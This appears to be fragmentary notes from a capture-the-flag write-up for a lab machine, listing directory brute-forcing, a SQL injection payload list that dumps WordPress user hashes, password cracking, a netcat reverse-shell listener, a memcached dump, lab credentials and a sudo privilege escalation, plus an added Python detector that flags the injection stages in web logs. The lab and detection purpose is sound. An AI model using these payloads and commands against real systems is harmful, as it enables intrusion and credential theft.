gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/workshop/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/root/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/lol/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/agent/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/feed/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/crawler/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/boot/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/comingreallysoon/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/interesting/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Save request into a file
SQL Injection
List
'
"
`
')
")
`)
'))
"))
`))
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 4--+
1' GROUP BY 1--+
1' GROUP BY 2--+
1' GROUP BY 3--+
1' GROUP BY 4--+
1' UNION SELECT null-- -
1' UNION SELECT null,null-- -
1' UNION SELECT null,null,null-- -
1' UNION SELECT null,null,null,null-- -
1' UNION SELECT null,null,null,null,null-- -
Get version
Sql
1'%20UNION%20SELECT%20null,null,VERSION()--%20
Display all database names
Sql
1'%20UNION%20SELECT%20null,null,table_schema from information_schema.columns--%20
Display tables inside wordpress database
Sql
1'%20UNION%20SELECT%20null,null,concat(table_name) from information_schema.columns where table_schema='wordpress'--%20
Display all columns of wp_users table
Sql
1'%20UNION%20SELECT%20null,null,concat(column_name) from information_schema.columns where table_schema='wordpress'and table_name='wp_users' --%20
Display results of userlogin, user_pass, and user_activation_key columns
Sql
1'%20UNION%20SELECT%20concat(user_login),concat(user_pass),concat(user_activation_key) from wordpress.wp_users--%20
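Added example (not part of the original write-up): the injection sequence above (column-count probing, null-only UNION SELECT, information_schema enumeration, then reading wp_users) leaves a staged trail that can be detected in web server logs. The sketch below classifies URL-decoded request targets into those stages and flags clients that progress through more than one; the combined log format, the /cart.php?code= parameter and the IP addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Stages of the injection sequence shown above, matched on the URL-decoded request target.
STAGES = [
    ("column_count", re.compile(r"['\"`]\)*\s*(order|group)\s+by\s+\d+", re.I)),
    ("union_probe",  re.compile(r"union\s+select\s+null(\s*,\s*null)*\s*--", re.I)),
    ("schema_enum",  re.compile(r"union\s+select\b.*\binformation_schema\b", re.I)),
    ("data_extract", re.compile(r"union\s+select\b.*\bfrom\s+(?!information_schema)\w", re.I)),
]
# Combined log format (assumed): client IP, quoted request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

def classify(target):
    """Return the stage names whose pattern matches the decoded request target."""
    decoded = unquote_plus(target)
    return [name for name, rx in STAGES if rx.search(decoded)]

def stages_by_client(lines):
    """Map each client IP to the distinct stages it triggered, in first-seen order."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        for stage in classify(m.group("target")):
            hits = seen.setdefault(m.group("ip"), [])
            if stage not in hits:
                hits.append(stage)
    return seen

def alerts(lines, min_stages=2):
    """Clients that progressed through at least min_stages distinct stages."""
    return {ip: s for ip, s in stages_by_client(lines).items() if len(s) >= min_stages}

# Constructed sample log: documentation IPs and a hypothetical /cart.php?code= parameter.
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /cart.php?code=1%27%20ORDER%20BY%203--+ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cart.php?code=1%27%20UNION%20SELECT%20null,null,null--%20- HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:20 +0000] "GET /cart.php?code=1%27%20UNION%20SELECT%20null,null,table_schema%20from%20information_schema.columns--%20 HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2024:10:00:41 +0000] "GET /cart.php?code=1%27%20UNION%20SELECT%20concat(user_login),concat(user_pass),concat(user_activation_key)%20from%20wordpress.wp_users--%20 HTTP/1.1" 200 1400',
    '203.0.113.20 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=order+by+price HTTP/1.1" 200 300',
    '203.0.113.21 - - [01/Jan/2024:10:01:05 +0000] "GET /cart.php?code=1%27%20ORDER%20BY%201--+ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, stages in alerts(SAMPLE).items():
        print(ip, "->", ", ".join(stages))
```

If the parameter travels in a POST body, access logs will not record it; run classify() over the body as captured by a WAF or application log instead.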
We have some credentials but they don't work for SSH. So there is info we are missing.
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john hash.txt --show
Sql
1'%20UNION%20SELECT%20concat(user_url),concat(user_email),concat(user_nicename) from wordpress.wp_users--%20
I added just the wekor site since the others are .com sites so I doubt they are being used.
We can see the site
We can log in with all accounts but yura is an admin
Credentials
Username: wp_yura
Password: soccer13
Initial Shell
Kali
nc -lvnp 1337
Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim
ss -ltp
TCP/11211 - Memcache
Victim
cd /usr/share/memcached/scripts/
./memcached-tool localhost:11211 dump
Lateral Movement
I couldn't ssh into the host but could su from www-data
Victim
su Orka
Password: OrkAiSC00L24/7$
Privilege Escalation
Victim
sudo -l
I couldn't really do anything with the bitcoin application itself but I could move the folder desktop and then replace the bitcoin with bash